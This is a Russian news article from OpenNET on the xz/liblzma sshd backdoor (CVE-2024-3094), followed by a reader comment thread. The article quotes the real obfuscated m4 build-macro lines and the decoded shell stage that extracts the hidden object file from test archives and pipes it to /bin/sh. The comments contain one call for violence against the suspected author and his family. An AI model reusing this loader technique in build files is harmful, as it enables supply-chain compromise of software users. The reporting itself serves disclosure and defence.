The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

В библиотеке xz/liblzma выявлен бэкдор, организующий вход через sshd

29.03.2024 22:18

В пакете XZ Utils, включающем библиотеку liblzma и утилиты для работы со сжатыми данными в формате ".xz", выявлен бэкдор (CVE-2024-3094), позволяющий перехватывать и модифицировать данные, обрабатываемые приложениями, связанными с библиотекой liblzma. Основной целью бэкдора является сервер OpenSSH, в некоторых дистрибутивах связанный с библиотекой libsystemd, которая, в свою очередь, использует liblzma. Связывание sshd с уязвимой библиотекой позволяет злоумышленникам получить доступ к SSH-серверу без аутентификации.

Бэкдор присутствовал в официальных выпусках xz 5.6.0 и 5.6.1, опубликованных 24 февраля и 9 марта, которые успели попасть в состав некоторых дистрибутивов и репозиториев, например, Gentoo, Arch Linux, Debian sid/unstable, Fedora Rawhide и 40-beta, openSUSE factory и tumbleweed, LibreELEC, Alpine edge, Solus, CRUX, Cygwin, MSYS2 mingw, HP-UX, Homebrew, KaOS, NixOS unstable, OpenIndiana, Parabola, PCLinuxOS, OpenMandriva cooker и rolling, pkgsrc current, Slackware current, Manjaro, Void Linux. Всем пользователям выпусков xz 5.6.0 и 5.6.1 рекомендуется срочно откатиться как минимум на версию 5.4.6, но желательно на 5.4.1, как последний выпуск, опубликованный прошлым сопровождающим.

Из сглаживающих проблему факторов можно отметить то, что версия liblzma c бэкдором не успела войти в состав стабильных выпусков крупных дистрибутивов, но затронула openSUSE Tumbleweed. Arch Linux и Gentoo использовали уязвимую версию xz, но не подвержены атаке, так как не применяют к OpenSSH патч для поддержки systemd-notify, приводящий к связыванию sshd к liblzma. Для Fedora 40-beta был опубликован пакет с xz 5.6.0, но из-за проблем с valgrind он был собран без поддержки IFUNC ('configure --disable-ifuncs'), т.е. бэкдор в нём был неработоспособен. Ubuntu и RHEL/CentOS не импортировали проблемные версии в свои репозитории. Бэкдор затрагивает только системы x86_64 на базе ядра Linux и Си-библиотеки Glibc, в которых sshd связывается с libsystemd для поддержки механизма sd_notify.

Код активации бэкдора был спрятан в m4-макросах из файла build-to-host.m4, используемого инструментарием automake при сборке. При сборке в ходе выполнения запутанных обфусцированных операций на основе архивов bad-3-corrupt_lzma2.xz и good-large_compressed.lzma, добавленных под предлогом использования в тестах корректности работы распаковщика, формировался объектный файл с вредоносным кодом, который включался в состав библиотеки liblzma и изменял логику работы некоторых её функций.

Активирующие бэкдор m4-макросы входили в состав tar-архивов релизов, но отсутствовали в Git-репозитории (были добавлены в .gitignore). При этом вредоносные тестовые архивы присутствовали в репозитории, т.е. внедривший бэкдор имел доступ как к репозиторию, так и к процессам формирования релизов. Более того, изначально файлы bad-3-corrupt_lzma2.xz и good-large_compressed.lzma были загружены 23 февраля перед релизом xz 5.6.0, а 9 марта обновлены перед релизом xz 5.6.1.

При использовании liblzma в приложениях вредоносные изменения могли использоваться для перехвата или модификации данных, а также для влияния на работу sshd. В частности, вредоносный код подменял функцию RSA_public_decrypt для обхода процесса аутентификации в sshd. Для неявного вызова и перехвата функций в бэкдоре применялся механизм IFUNC, присутствующий в Glibc. Бэкдор включал защиту от обнаружения и не проявлял себя при выставленных переменных окружения LANG и TERM (т.е. при запуске процесса в терминале) и не выставленных переменных окружения LD_DEBUG и LD_PROFILE, а активировался только при выполнении исполняемого файла /usr/sbin/sshd. В бэкдоре также имелись средства обнаружения запуска в отладочных окружениях.

В файле m4/build-to-host.m4 использовались конструкции


  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
...
  gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'

В первой конструкции операция grep находила файл tests/files/bad-3-corrupt_lzma2.xz, при распаковке которого формировался сценарий, распаковывающий объектный файл из второго архива:


####Hello####
#345U211267$^D330^W
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 .... && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####

Каким образом злоумышленникам удалось получить доступ к инфраструктуре проекта xz пока до конца не выяснено, но по предварительным данным внедрение бэкдора осуществлено целенаправленно одним из активных разработчиков проекта xz. Так же пока не ясно как много пользователей и проектов были скомпрометированы в результате действия бэкдора. Предполагаемый автор бэкдора (JiaT75 - Jia Tan), разместивший в репозитории архивы с вредоносным кодом и затем их обновивший, переписывался с разработчиками Fedora и отправлял pull-запросы в Debian, связанные с переходом дистрибутивов на ветку xz 5.6.0.

Разработчик Jia Tan не вызвал подозрений, так как участвовал в разработке xz, имел статус "co-maintainer" на протяжении последних двух лет, выпускал релизы начиная с xz 5.4.2 и являлся вторым участником проекта по числу внесённых изменений. Помимо проекта xz предполагаемый автор бэкдора также участвовал в разработке пакетов xz-java и xz-embedded. Более того, Jia Tan несколько дней назад был включён в число мэйнтейнеров проекта XZ Embedded, используемого в ядре Linux.

Вредоносное изменение было выявлено после анализа излишнего потребления CPU и ошибок, выдаваемых valgrind, при подключении через ssh к системам на базе Debian sid. Примечательно, что в релиз xz 5.6.1 были включены изменения, подготовленные предполагаемым автором бэкдора в ответ на жалобы о замедлении работы и сбоях sshd, возникшие после обновления до версии xz 5.6.0 с бэкдором. Кроме того, в прошлом году Jia Tan внёс изменения, несовместимые с режимом проверки "-fsanitize=address", что привело к его отключению при fuzzing-тестировании.

Дополнение 1: GitHub полностью заблокировал репозитории xz, xz-java и xz-embedded, которые теперь недоступны для анализа и загрузки прошлых версий. Также заблокирован официальный сайт проекта xz.tukaani.org. На archive.org и сайте проекта осталась последняя рабочая копия.

Дополнение 2: В 2021 году Jia Tan передал изменение в проект libarchive и добился замены вызова safe_fprintf на небезопасный fprintf (несколько часов назад изменение было отменено).

Дополнение 3: Опубликован разбор событий, способствующих продвижению бэкдора в пакет xz.

Дополнение 4: Lasse Collin, прошлый сопровождающий проекта xz, передавший права Jia Tan, опубликовал заявление, в котором подтвердил, что архивы с содержащими бэкдор релизами были созданы и подписаны Jia Tan. Он также сообщил об удалении поддомена xz.tukaani.org (сайт xz будет возвращён на основной сервер tukaani.org) и упомянул, что его учётную запись на GitHub заблокировали. Lasse Collin единолично контролирует сайт tukaani.org и репозитории git.tukaani.org, а Jia Tan контролировал только проект на GitHub и хост xz.tukaani.org, но не имел доступа к серверу tukaani.org.

Дополнение 5: Разбор логики активации и работы бэкдора в пакете xz.

Дополнение 6: В сборочном сценарии CMakeLists.txt выявлено вредоносное изменение, не позволяющее использовать в xz механизм изоляции приложений Landlock.

Дополнение 7: По мотивам выявленного бэкдора подготовлен инструментарий xzbot, включающий в себя: honeypot для создания фиктивных серверов, притворяющихся уязвимыми для выявления попыток подключения злоумышленников; патч для замены открытого ключа в бэкдоре внутри liblzma.so на свой ключ (чтобы подключаться к бэкдору по своему закрытому ключу); демонстрацию для инициирования выполнения кода в модифицированном бэкдоре, используя свой закрытый ключ.

  1. Главная ссылка к новости (https://www.openwall.com/lists...)
  2. OpenNews: В deb-пакетах с Free Download Manager найден бэкдор, который оставался незамеченным три года
  3. OpenNews: В UEFI-прошивках материнских плат Gigabyte выявлена активность, напоминающая бэкдор
  4. OpenNews: Бэкдор в 93 плагинах и темах оформления AccessPress, применяемых на 360 тысячах сайтов
  5. OpenNews: Вредоносное ПО, поражающее NetBeans для внедрения бэкдоров в собираемые проекты
  6. OpenNews: В Webmin найден бэкдор, позволяющий удалённо получить доступ с правами root
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/60877-backdoor
Ключевые слова: backdoor, xz, liblzma, ssh
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (374) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, semester (ok), 22:43, 29/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    И как понять что тот бекдор успел натворить? Если он больше месяца существует.
     
     
  • 2.4, Bonbon (?), 22:50, 29/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    For our openSUSE Tumbleweed users where SSH is exposed to the internet we recommend installing fresh, as it’s unknown if the backdoor has been exploited. Due to the sophisticated nature of the backdoor an on-system detection of a breach is likely not possible. Also rotation of any credentials that could have been fetched from the system is highly recommended.
    https://news.opensuse.org/2024/03/29/xz-backdoor/
     
  • 2.9, Alexander_R (ok), 22:59, 29/03/2024 [^] [^^] [^^^] [ответить]  
  • +11 +/
    Не просто больше месяца существует - автор бэкдора 2 года в проекте (!!) и отправлял к нему многочисленные патчи с исправлениями (в том числе для повышения скрытности).

    При этом явно предпринималась попытка замаскировать полную компроментацию проекта xz под "всего лишь" компроментацию тарболов, а сам бэкдор не активировался если запускать исполняемые файлы с поражённой liblzma в терминале. Не известно, единственный ли это бэкдор или были другие (а ещё аккаунт автора вовлечён в разработку кучи других проектов, таких как java-версия xz...)

    Не исключено, что к моменту публикации новости аффтар уже почистил за собой все следы и перезагрузил за вас ваши сервера 0_o

     
     
  • 3.10, Ано ним (?), 23:14, 29/03/2024 [^] [^^] [^^^] [ответить]  
  • –4 +/
    откуда дровишки?
     
     
  • 4.14, Alexander_R (ok), 23:24, 29/03/2024 [^] [^^] [^^^] [ответить]  
  • +3 +/
    В обсуждении на openwall много чего есть из не упомянутого в новости.
     
  • 2.98, Аноним (98), 07:55, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > И как понять что тот бекдор успел натворить? Если он больше месяца существует.

    Audit + Accounting + MAC и логи на другой сервер, который без бекдора с xz. Тогда есть шанс что-то увидеть.

     
     
  • 3.101, Аноним (98), 08:04, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    https://www.opennet.dev/openforum/vsluhforumID10/5622.html

    Написал скриптик и подправил /etc/inittab для исследования CAP. В результате теперь pscap не имеет процессов с full привилегиями. Все процессы пользователя root в системе имеют только необходимые и достаточные привилегии для своей работы. В логах:

    zgrep -h 'Operation not permmited' /var/log/* |sort |uniq

    появляются сообщения о привышении процессом необходимых ему привилегий.

     
  • 3.333, semester (ok), 22:05, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Accounting это какие примеры?
     

  • 1.5, FSA (??), 22:51, 29/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • –14 +/
    Короче. Инцидент был и он в дистрибутивах был, которые никто в здравом уме не будет ставить на прод. А ломать домашние машины... которые по какой-то причине выставлены в сеть... ну это цель нужна и ждать подходящего момента... сомнительное удовольствие.
     
     
  • 2.7, Аноним (7), 22:56, 29/03/2024 [^] [^^] [^^^] [ответить]  
  • +4 +/
    Создать ботнет и наехать на "конкретных" , не ?
     
     
  • 3.161, Аноним324 (ok), 11:03, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Все современные ботнеты, они исключительно иот. А там как всегда протухшая на 5-7 лет версия ядра.
     
     
  • 4.174, Аноним (174), 11:21, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Не надо себя убаюкивать . Ботнеты на всём , что удасться взломать . И чем круче железка - тем больше вероятность что тебя же и заподозрят .
     
  • 4.411, Аноним (-), 01:05, 04/04/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > Все современные ботнеты, они исключительно иот. А там как всегда протухшая на 5-7
    > лет версия ядра.

    Именно поэтому у меня воооон там в логах немеряно левака с каких-то маздаев таких как ты васянов и прочих дырохостингов с суперблохами - где водятся баги.

    Отовсюду лезут на самом деле. Все что можно использовать нашару - используют. Нахаляву и уксус сладкий.

     
  • 2.119, NameName (?), 09:31, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    На домашних машинах может быть столько криптовалюты что целой группе авторов хватит до конца жизни
     
     
  • 3.162, Аноним324 (ok), 11:03, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –3 +/
    Какой идиот хранит крипту на компе?
     
     
  • 4.311, а (?), 17:50, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    я извиняюсь, а где?
     
     
  • 5.323, сщта (?), 19:17, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Малинку заведите. И спрятать эту Тамогочу в кладовку с донорскими платами чтобы никто не узнал.)
     
  • 5.328, Аноним324 (ok), 20:30, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > я извиняюсь, а где?

    Есть такие устройства, кошельки называются, можешь даже сам такой сделать, штучка которая выглядит как флешка, которая не имеет доступа в интернет и защищена шифрованием, паролями, биометрией чем угодно.

     
     
  • 6.330, namenotfound (?), 21:35, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +3 +/
    да, а потом как с неё деньги выводить обратно? не через интернет ли случаем?
     
  • 6.364, Аноним (364), 15:53, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    А потом этот кошелек выходит из строя и привет. Такое уже было.
     
  • 2.141, n00by (ok), 10:19, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +4 +/
    > Короче. Инцидент был и он в дистрибутивах был, которые никто в здравом
    > уме не будет ставить на прод. А ломать домашние машины... которые
    > по какой-то причине выставлены в сеть... ну это цель нужна и
    > ждать подходящего момента... сомнительное удовольствие.

    Протроянить Васяна, который собирает пакетики для "прода" - тянет на цель?

    rosa2023.1-5.6.1-2 2024.03.30
    rosa2023.1-5.6.1-1 2024.03.09
    rosa2023.1-5.6.0-1 2024.02.25
    rosa2023.1-5.2.9-1 2022.12.07

     
     
  • 3.220, Всем Анонимам Аноним (?), 12:28, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Ну так цель то ясна, Васяна наняли для конктретного дележа денег, пока государство целенаправленно это собирание спонсирует и навязывает.
     
  • 3.404, Аноним (-), 14:13, 01/04/2024 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Про воспроизводимые сборки в НТЦ ИТ Роса никто и не слышал.
     

  • 1.6, Перастерос (ok), 22:52, 29/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    найти и наказать гада — это одно, не допускать такого в принципе — другое..
     
     
  • 2.33, Аноним (33), 00:18, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +4 +/
    Во! Если уж бэкдор, то только хардварный, только хардкор! Не допускать васянство!
     
     
  • 3.392, Аноним (-), 06:43, 01/04/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > Во! Если уж бэкдор, то только хардварный, только хардкор! Не допускать васянство!

    Intel ME вместе с PSP передать просили - ALL YOUR BASE ARE BELONGS TO US!

     
  • 2.79, Аноним (79), 02:57, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Нужно заставить гада извиниться на камеру
     
     
  • 3.105, Sw00p aka Jerom (?), 08:24, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    ну попробуй, заставь сотрудника правительственной связи ее величества это сделать :)
     
     
  • 4.281, Аноним (281), 14:21, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Что так слабо? Заставь её величество извиниться!
     
  • 4.290, Прохожий (??), 15:31, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Почему её? Его же, ну
     
     
  • 5.317, Аноним (317), 18:35, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Её интереснее. Расскажет, как там климат, на чём жарят - на масле или на голой сковороде
     
  • 3.381, adolfus (ok), 20:32, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Какой, извиниться? Его валить нужно. А если есть семья, то и семью.
     
  • 3.410, vantoo (ok), 15:43, 02/04/2024 [^] [^^] [^^^] [ответить]  
  • +/
    И отрезать ему ухо!
     

  • 1.8, kusb (?), 22:58, 29/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    хз-utils, ну что, уважаемо, эпично. Эта библиотека есть прям везде. И самое дурное, ведь архиватору не нужен доступ почти ни к чему. Но такой изоляции нет.
     
     
  • 2.13, sesto (?), 23:23, 29/03/2024 [^] [^^] [^^^] [ответить]  
  • –7 +/
    Да что ты говоришь? Это же чушь несусветная. RHEL или MS напрямую у тебя берут данные и отдают кому надо.

    А здесь ты можешь смотреть, что и происходит. Так Базар и развивается, а за Собором в MS.

     
     
  • 3.144, n00by (ok), 10:22, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Эпично, что "гуманитарий" уловил суть, а "технарь", слегка подвинутый на идеологии, пытается спорить.
     
     
  • 4.365, Аноним (364), 15:56, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Но он прав в том, что один бэкдор в мире Linux был относительно быстро обнаружен вызвал скандал, а закрытая Windows может быть нашпигована по самое нехочу но ничего поделать с этим нельзя.
     
     
  • 5.375, n00by (ok), 17:35, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    "Может быть" ключевое слово, а "ничего поделать с этим нельзя" следует читать как "ничего не умею".

    Например вот эту штука http://www.online-solutions.ru/products/osss-security-suite.html много чего могла на тех ОС, где работала.

     
     
  • 6.417, Аноним (417), 11:02, 26/04/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Да, читать нужно уметь, но не так альтернативно одаренно, по итгу буквально все - мимо. Ключевое слово - "есть", а именно не может не быть, но ты же споришь с очевидным. Можешь обнаруживать там что угодно, но что сделаешь с этим? Пофиксишь в hex-editor? Особенно когда срок поддержки завершен - отложите все дела, устанавливаются новые уязвимости, и все по новому.
     
     
  • 7.420, n00by (ok), 09:01, 28/04/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Ну почему же всё итгу - годный пример, что читать надо уметь Особенно, что с... большой текст свёрнут, показать
     
  • 3.354, Аноним (354), 09:53, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Ага, уже пошёл смотреть все сорсы всех либ, используемых в моем дистре, начиная с ядра. Сколько там, терабайт наберётся на почитать?
     
  • 2.312, pelmaniac (?), 18:03, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    >Эта библиотека есть прям везде

    в дебианах (даже 12м) нет пока сам не поставишь. на rhel сильно старое. нашёл среди своего хозяйства только на арче, но кто ж там что важное будет хранить?

     
     
  • 3.320, myster (ok), 18:53, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > только на арче

    Arch не был подвержен этому вектору атаки, там openssh не использовал liblzma, в отличие от DEB и RPM дистрибутивов.
    Так что даже забекдорить с уязвимой версией xz, Arch бы не удалось.

     

  • 1.11, birdie (ok), 23:15, 29/03/2024 [ответить] [﹢﹢﹢] [ · · · ]  
  • –24 +/
    Я уже много лет говорю об этой проблеме и о том, как плохо обстоят дела с безопа... большой текст свёрнут, показать
     
     
  • 2.15, Аноним (15), 23:27, 29/03/2024 [^] [^^] [^^^] [ответить]  
  • +10 +/
    Все ок, но про одобрение каждой строчки кода уже слишком жирно
     
     
  • 3.24, birdie (ok), 23:49, 29/03/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Да, примерно так.

    Причём код проверяет не один человек, а несколько.

    Жирно - это к open source. На первой странице Opennet это уже вторая (!) новость про то, что ни черта никто не проверяет, а эту уязвимость просто случайно (!) обнаружили, потому что код трояна был кривой и вызывал задержки в работе SSHD.

     
     
  • 4.125, Аноним (125), 10:00, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Ты лично видел, как проверяли всей оргией каждую строчку кода? Готов имена назвать конкретных тимлидов, которые всё-всё проверили и последствия их кодинга никогда не обсуждались на каком-нибудь Black Hat?

    Проблема очевидная - недостаток ментейнеров (или их квалификации) в дистрибутивах, раз уж это дошло до апстрима. Хочешь побыть Линусом, одобряя каждую версию пакета, подставляя свою репутацию и убивая в это время? Вперёд, никто не держит. Мы потом всем опеннетом вместе посмеёмся.

     
  • 2.18, Аноним (18), 23:29, 29/03/2024 [^] [^^] [^^^] [ответить]  
  • +10 +/
    Каким боком здесь безопасность линукса? Это не дыра в ядре, не эскалация привилегий, а банальный троян в пользовательском приложении.

    В винде же троянов не бывает, а майкрософт лично проверяет код каждого экзешника в интернете. Не забудь принять таблетки.

     
     
  • 3.19, semester (ok), 23:33, 29/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    ну объективно говоря от этого приложения зависит пол системы. Может я не прав, но получается ты ставишь "winrar" и половина винды от него зависит.
     
     
  • 4.27, Аноним (18), 00:02, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Да, но если так же скомпрометировать популярную библиотеку на винде, разница будет лишь в том, что копия вирусной dll-ки будет лежать в комплекте у каждого отдельного приложения.
    Что кстати ЗНАЧИТЕЛЬНО усложняет процесс обезвреживания, ведь нельзя просто обновить 1 пакет, а придется обновлять КАЖДОЕ приложение у которого эта dll в комплекте.
     
     
  • 5.148, n00by (ok), 10:31, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > Да, но если так же скомпрометировать популярную библиотеку на винде, разница будет
    > лишь в том

    Разница в том, что для верности аналогии тебе придётся скомпрометировать библиотеку advapi32.dll. Так что вперёд.

     
  • 4.146, n00by (ok), 10:27, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > ну объективно говоря от этого приложения зависит пол системы. Может я не
    > прав

    В формулировке ошибка: это компонент системы, а не приложение, как его пытался выставить анонимный тролль. По существу всё верно.

     
  • 4.313, pelmaniac (?), 18:05, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    >объективно говоря от этого приложения зависит пол системы

    да откуда вы такие беретесь? не зависит от xz ничего, его даже поставить надо руками.

     
     
  • 5.327, Аноним (327), 20:25, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +3 +/
    apt autopurge xz-utils Чтение списков пакетов 8230 Готово Построение дерева за... большой текст свёрнут, показать
     
  • 3.20, birdie (ok), 23:46, 29/03/2024 [^] [^^] [^^^] [ответить]  
  • –13 +/
    > В винде же троянов не бывает, а майкрософт лично проверяет код каждого экзешника в интернете. Не забудь принять таблетки.

    Примеры backdoors в продуктах Microsoft в студию. Хотя бы один за 40 с лишним лет, что они существуют.

    > а майкрософт лично проверяет код каждого экзешника в интернете

    Я говорил про software, который создаёт и распространяет сама MS официально. Мне плевать на то, кто и что "распространяет в Интернет". Начните с умения читать и понимать написанное - у вас с этим проблемы.

    > Не забудь принять таблетки.

    Попробуй мне это в лицо сказать, анонимный тролль.

     
     
  • 4.25, Аноним (18), 23:56, 29/03/2024 [^] [^^] [^^^] [ответить]  
  • +4 +/
    > Примеры backdoors в продуктах Microsoft в студию.

    Сначала ты примеры backdoors в продуктах Linux Foundation в студию.

    > Я говорил про software, который создаёт и распространяет сама MS официально. Мне плевать на то, кто и что "распространяет в Интернет".

    То есть все люди на винде пользуются исключительно приложениями от MS и никакими другими? Ну-ну.

     
     
  • 5.40, Аноним (40), 00:32, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Ну вот буквально несколько дней назад нашли в Fedora (продукте redhat, платинового спонсора lf). Прув: https://www.opennet.dev/cgi-bin/openforum/vsluhboard.cgi?az=post&om=133254&foru
     
  • 5.45, Fyjy (-), 00:37, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Да легко!
    Как насчет Bvp47 ?
    По слухам связан с NSA, но проверить естественно невозможно.
    "287 organizations in 45 countries and went largely undetected for over 10 years"

    Вот оно качество поделок от линукс фаундейшн, не зря же Линус получай лям в месяц, ну.. от уважаемых партнеров.

    А еще можно вспомнить уязвимости в драйверах.
    Да практически каждую вторую RCE в ядре с получением рута можно считать бекдором, замаскированным под "сишник опять обделался и вышез за границы буфера"

     
     
  • 6.51, Аноним (18), 00:45, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +6 +/
    Так падажи, но если считать дыры за умышленные бэкдоры, то винда тогда по этому критерию чемпион вне конкуренции получается. А если еще учесть, что довольно много кода в ядро вносят работники MS...
    Тут как говорится, если слишком тщательно расследовать дело, то можно случайно выйти на себя.
     
     
  • 7.57, Fyjy (-), 01:06, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –3 +/
    А про Bvp47 есть что сказать Эм как-то не получается Linux Kernel - 3876 ... большой текст свёрнут, показать
     
     
  • 8.61, Аноним (18), 01:18, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Здесь стоит опять же учитывать, что например злополучный ядерный модуль ksmbd, в... текст свёрнут, показать
     
     
  • 9.64, Fyjy (-), 01:27, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Ну так не принимайте от них модули А то уже был прецедент с деревянным конем в ... текст свёрнут, показать
     
     
  • 10.69, Аноним (18), 01:43, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Не, это не выход, так можно вообще перестать любой код принимать Есть жирный пл... текст свёрнут, показать
     
  • 9.80, iPony129412 (?), 03:25, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Нет Это не Microsoft пишет его И не более злополучен чем остальное ядро ... текст свёрнут, показать
     
  • 8.67, твёрдый ветер (?), 01:38, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    так уязвимости ведь разные бывают - DoS Denial of Service отказ в обслуживани... текст свёрнут, показать
     
     
  • 9.75, Аноним (-), 01:54, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Если честно, мне лень искать и считать сколько у кого RCE, сколько privilege esc... текст свёрнут, показать
     
  • 8.121, Аноним (121), 09:44, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Стоп, а почему по Винде ты взял только две последние версии Опять подгоняешь ус... текст свёрнут, показать
     
     
  • 9.147, Аноним (147), 10:30, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Потому что более ранние версии - EOL Мы же не считаем дырки в ненужном начиная ... текст свёрнут, показать
     
  • 4.28, Аноним (28), 00:07, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Примеры backdoors в продуктах Microsoft в студию. Хотя бы один за 40 с лишним лет, что они существуют.

    Вы серьёзно? Тут даже сложно комментировать ибо вы похоже очень многое пропустили... Вы хоть знаете фамилию президанта РФ? :)

     
     
  • 5.286, Вася (??), 14:51, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    это константа
     
  • 4.36, Аноним (36), 00:28, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Держи. Не захлебнись только.

    https://www.cvedetails.com/vulnerability-list/vendor_id-26/product_id-32238/Mi

     
     
  • 5.50, birdie (ok), 00:45, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Разницу между malware/backdoor и vulnerability чувствуете? Видимо, вообще нисколько.
     
  • 5.71, Аноним (-), 01:44, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    > Держи. Не захлебнись только.

    Linux Kernel обгоняет винду десятку на 796 CVE
    cvedetails.com/vulnerability-list/vendor_id-33/product_id-47/Linux-Linux-Kernel.html

    Так что пример явно так себе))

     
     
  • 6.83, Skullnet (ok), 03:44, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Мы не знаем сколько на самом деле CVE в винде, потому что винда не open-source. Скорее всего в 10 раз больше. К тому же доверия closed-source софту, а особенно софту от биг-корпораций нет.
     
     
  • 7.110, Аноним (-), 09:01, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > К тому же доверия closed-source софту, а особенно софту от биг-корпораций нет.

    Ну да, а доверие к опенсорс софту  - есть?))

    У нас тут новость про бекдор, вообще-то!
    Который не заметило ни 'сообщество', ни мейнтейнеры, которые по идее должны быть более компетентные)
    Это раз.

    Исходники винды закрыты весьма условно.
    Во-первых, кому надо их отдают на аудит.
    Во-вторых, исходники винды утекали и не раз. Но даже после этого никто не нашел там бекдоров и заявил об этом.
    Это два.

    Ну а три - твоя оценка в 10 раз с потолка.
    Никто не знает сколько багов ядра были потенциальными CVE которые просто исправили.

    Это как раз пример, что (и) в опенсорсе никто ни за что не отвечает и доверять им нельзя, не смотря что код дают на блюдечке.

     
     
  • 8.127, Аноним (125), 10:06, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +/
    Фишка опенсорса в том, что за тебя сделали работу по реализации функционала и от... текст свёрнут, показать
     
     
  • 9.135, Аноним (-), 10:13, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Стоп-стоп Мы сейчас не про достоинства опенсорса А про то что аргумент опенсо... текст свёрнут, показать
     
  • 9.329, Аноним (327), 20:47, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Это не фишка, а насадка на зависимость ... текст свёрнут, показать
     
  • 8.214, Skullnet (ok), 12:13, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Исходники Шрёдингера И бекдоры тоже добавляет тот кому надо Ага, утекали исход... текст свёрнут, показать
     
     
  • 9.223, Аноним (-), 12:35, 30/03/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Ты это про винду Или про те бинарники, которые тебе в пакетный менеджер прилета... текст свёрнут, показать
     
     
  • 10.347, Skullnet (ok), 03:09, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Спасают, бекдор исправили, а в винде хз, наверное ещё даже не нашли А про бекдо... текст свёрнут, показать
     
     
  • 11.360, Аноним (360), 10:44, 31/03/2024 [^] [^^] [^^^] [ответить]  
  • –1 +/
